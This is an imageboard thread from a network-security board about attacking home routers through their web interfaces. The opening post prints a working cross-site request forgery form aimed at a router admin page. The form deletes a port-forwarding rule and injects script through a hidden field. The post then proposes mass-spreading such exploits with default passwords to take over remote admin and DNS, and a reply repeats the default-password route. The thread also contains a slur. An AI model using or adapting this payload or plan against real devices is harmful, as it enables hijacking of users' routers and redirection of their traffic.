[ home / board list / faq / random / create / bans / search / manage / irc ] [ ]

/hack/ - Network Security

325f7164bc9f243cffaab287122f588d

Catalog

See 8chan's new software in development (discuss) (help out)
Please read: important information about failed Infinity Next migration
Name
Email
Subject
Comment *
File
* = required field[▶ Show post options & limits]
Confused? See the FAQ.
Options
Password (For file and post deletion.)

Allowed file types:jpg, jpeg, gif, png, webm, mp4
Max filesize is 8 MB.
Max image dimensions are 10000 x 10000.
You may upload 3 per post.


File: 1443171512131.jpg (736.63 KB, 3840x2060, 192:103, vVXzWQ32ZPZqhEZZo7jl4qc3Rs….jpg)

 No.740

The web ui on modems and routers are very insecure.

Found this in 15 minutes


<form action="http://192.168.0.1/scvrtsrv.cmd" method="post" target="hidden">
<input type="hidden" name="action" value="remove_port_forwarding">
<input type="hidden" name="needthankyou" value='BREAK"; alert("ayy lmao");//'>
<input type="hidden" name="rmLst" value="192.168.0.2|2777|2777|TCP|2777|2777|0.0.0.0">
<input type="submit" value="Go, Baby, Go!">
</form>

Imagine if you wrote 2 dozen router lock out exploits and loaded default passwords into a script somewhere and either got people to click the link or embedded it on a page.

or like set remote admin and change the password. Mabe fuck with DNS?

just a thought

nobully

 No.777

File: 1449387467217.jpg (18.89 KB, 202x212, 101:106, 1446917157623.jpg)

do it faggot


 No.778

Don't really need exploits when no one changes the default password from 'admin'.

From there you can change DNS settings and set up port forwarding.




[Return][Go to top][Catalog][Post a Reply]
Delete Post [ ]
[]
[ home / board list / faq / random / create / bans / search / manage / irc ] [ ]